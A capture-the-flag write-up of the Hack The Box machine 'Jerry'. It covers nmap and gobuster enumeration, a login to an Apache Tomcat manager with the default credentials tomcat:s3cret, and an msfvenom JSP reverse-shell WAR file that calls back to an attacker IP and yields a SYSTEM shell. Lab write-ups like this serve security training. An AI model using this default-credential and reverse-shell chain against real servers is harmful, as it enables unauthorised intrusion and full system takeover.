# Jerry

### Initial Enumeration

```bash
sudo nmap -T5 -p- -oN T-all 10.10.10.95
```

```bash
 Nmap 7.70 scan initiated Sat Jul  6 13:24:49 2019 as: nmap -sV -sC -p 8080 -oN O-Detailed 10.10.10.95
Nmap scan report for 10.10.10.95
Host is up (0.26s latency).

PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Jul  6 13:25:05 2019 -- 1 IP address (1 host up) scanned in 15.85 seconds
```

`Port 8080` was the default installation of the `Apache Tomcat` server. The server was last updated in May 2018, hence had no exploits in `Searchsploit`.

```bash
gobuster dir -t 50 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -o gobuster-medium -u http://10.10.10.95:8080
```

```bash
/docs (Status: 302)
/examples (Status: 302)
/manager (Status: 302)
```

The manager one seemed interesting, and when I hit the URL it asked for credentials, I tried default tomcat credentials `tomcat:s3cret` and they worked.

![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-Lj5LFLLpXjJfpPDYI8i%2F-Lj5MRW10pvg1SYHzQpC%2Fimage.png?alt=media\&token=c82759a3-46ad-4453-829b-01c77ae09ead)

### User Own & Root Own

An option to deploy my own `WAR file` was available so I built up a reverse shell using `msfvenom` for the server.

```bash
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.7 LPORT=9999 -f war > shell.war
```

![](https://3859502357-files.gitbook.io/~/files/v0/b/gitbook-legacy-files/o/assets%2F-Lipzhcjodrl0Qw14cdW%2F-Lj5LFLLpXjJfpPDYI8i%2F-Lj5Mg3s5ehLbiMPC0_4%2Fimage.png?alt=media\&token=5465358e-629f-4f2f-a25f-edbe2cccd94b)

The shell was uploaded and once this URL is hit I got a reverse shell as `NT Authority/System`

```
Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  07:09 AM    <DIR>          .
06/19/2018  07:09 AM    <DIR>          ..
06/19/2018  07:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)  27,598,893,056 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"
user.txt
7004d***

root.txt
04a8b***
```

### Learning Outcome

Whenever you get a shell, check who you are before running around for enumerating the server. In this case it took me quite a while to understand that I was running as root since beginning of time.